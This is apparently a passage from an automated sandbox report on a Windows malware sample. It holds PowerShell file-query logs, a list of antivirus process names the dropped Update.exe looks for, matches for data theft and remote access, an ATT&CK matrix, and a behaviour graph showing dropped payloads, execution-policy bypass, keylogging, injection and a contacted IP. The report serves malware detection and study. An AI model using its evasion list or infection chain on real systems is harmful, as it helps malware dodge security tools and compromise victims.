    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00401626 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401626
    Source: C:\Users\Public\Bilite\Axialis\Update.exeCode function: 3_2_04335D22 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04335D22
    Source: C:\Users\user\Desktop\6f0slJzOrF.exeCode function: 0_2_00404FAA GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,memset,ShellExecuteExW,WaitForSingleObject,CloseHandle,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00404FAA
    Source: C:\Users\Public\Bilite\Axialis\Update.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
    Source: Update.exeBinary or memory string: acs.exe
    Source: Update.exeBinary or memory string: avcenter.exe
    Source: Update.exeBinary or memory string: kxetray.exe
    Source: Update.exeBinary or memory string: vsserv.exe
    Source: Update.exeBinary or memory string: avp.exe
    Source: Update.exeBinary or memory string: cfp.exe
    Source: Update.exeBinary or memory string: KSafeTray.exe
    Source: Update.exeBinary or memory string: 360Safe.exe
    Source: Update.exeBinary or memory string: 360tray.exe
    Source: Update.exeBinary or memory string: rtvscan.exe
    Source: Update.exeBinary or memory string: TMBMSRV.exe
    Source: Update.exeBinary or memory string: ashDisp.exe
    Source: Update.exeBinary or memory string: 360Tray.exe
    Source: Update.exeBinary or memory string: avgwdsvc.exe
    Source: Update.exeBinary or memory string: AYAgent.aye
    Source: Update.exeBinary or memory string: QUHLPSVC.EXE
    Source: Update.exeBinary or memory string: RavMonD.exe
    Source: Update.exeBinary or memory string: Mcshield.exe
    Source: Update.exeBinary or memory string: K7TSecurity.exe

    Stealing of Sensitive Information

    barindex
    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 7496, type: MEMORYSTR

    Remote Access Functionality

    barindex
    Source: Yara matchFile source: Process Memory Space: Update.exe PID: 7496, type: MEMORYSTR
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information1
    Scripting
    1
    Replication Through Removable Media
    1
    Windows Management Instrumentation
    1
    Scripting
    1
    DLL Side-Loading
    1
    Disable or Modify Tools
    141
    Input Capture
    2
    System Time Discovery
    Remote Services11
    Archive Collected Data
    1
    Ingress Tool Transfer
    Exfiltration Over Other Network Medium1
    Data Encrypted for Impact
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    Access Token Manipulation
    1
    Deobfuscate/Decode Files or Information
    LSASS Memory11
    Peripheral Device Discovery
    Remote Desktop Protocol1
    Screen Capture
    2
    Encrypted Channel
    Exfiltration Over Bluetooth1
    System Shutdown/Reboot
    Email AddressesDNS ServerDomain Accounts1
    PowerShell
    Logon Script (Windows)222
    Process Injection
    2
    Obfuscated Files or Information
    Security Account Manager3
    File and Directory Discovery
    SMB/Windows Admin Shares141
    Input Capture
    1
    Non-Standard Port
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Software Packing
    NTDS38
    System Information Discovery
    Distributed Component Object Model2
    Clipboard Data
    Protocol ImpersonationTraffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets141
    Security Software Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    Masquerading
    Cached Domain Credentials31
    Virtualization/Sandbox Evasion
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
    Modify Registry
    DCSync4
    Process Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
    Virtualization/Sandbox Evasion
    Proc Filesystem11
    Application Window Discovery
    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
    Access Token Manipulation
    /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron222
    Process Injection
    Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
    Indicator Removal
    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 1582215 Sample: 6f0slJzOrF.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 67 Suricata IDS alerts for network traffic 2->67 69 Multi AV Scanner detection for dropped file 2->69 71 Multi AV Scanner detection for submitted file 2->71 73 6 other signatures 2->73 9 6f0slJzOrF.exe 10 2->9         started        process3 file4 51 C:\Users\Public\...\winrar-x64-700scp.exe, PE32+ 9->51 dropped 53 C:\Users\Public\Bilite\Axialis\Update.exe, PE32 9->53 dropped 55 C:\Users\Public\Bilite\Axialis\Update.dll, PE32 9->55 dropped 12 cmd.exe 1 9->12         started        process5 signatures6 75 Bypasses PowerShell execution policy 12->75 15 Update.exe 3 8 12->15         started        20 conhost.exe 12->20         started        process7 dnsIp8 57 154.82.85.79, 18091, 18852, 49899 ROOTNETWORKSUS Seychelles 15->57 45 C:\Users\user\AppData\Local\Temp\backup.exe, PE32 15->45 dropped 47 C:\Users\user\AppData\Local\Temp\backup.dll, PE32 15->47 dropped 49 C:\Users\user\AppData\Local\updated.ps1, ASCII 15->49 dropped 59 Detected unpacking (creates a PE file in dynamic memory) 15->59 61 Contains functionality to inject threads in other processes 15->61 63 Contains functionality to capture and log keystrokes 15->63 65 Contains functionality to inject code into remote processes 15->65 22 cmd.exe 1 15->22         started        24 cmd.exe 1 15->24         started        26 cmd.exe 1 15->26         started        file9 signatures10 process11 process12 28 powershell.exe 39 22->28         started        31 conhost.exe 22->31         started        33 powershell.exe 1 23 24->33         started        35 conhost.exe 24->35         started        37 conhost.exe 26->37         started        39 tasklist.exe 1 26->39         started        41 timeout.exe 1 26->41         started        43 10 other processes 26->43 signatures13 77 Loading BitLocker PowerShell Module 28->77

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    SourceDetectionScannerLabelLink
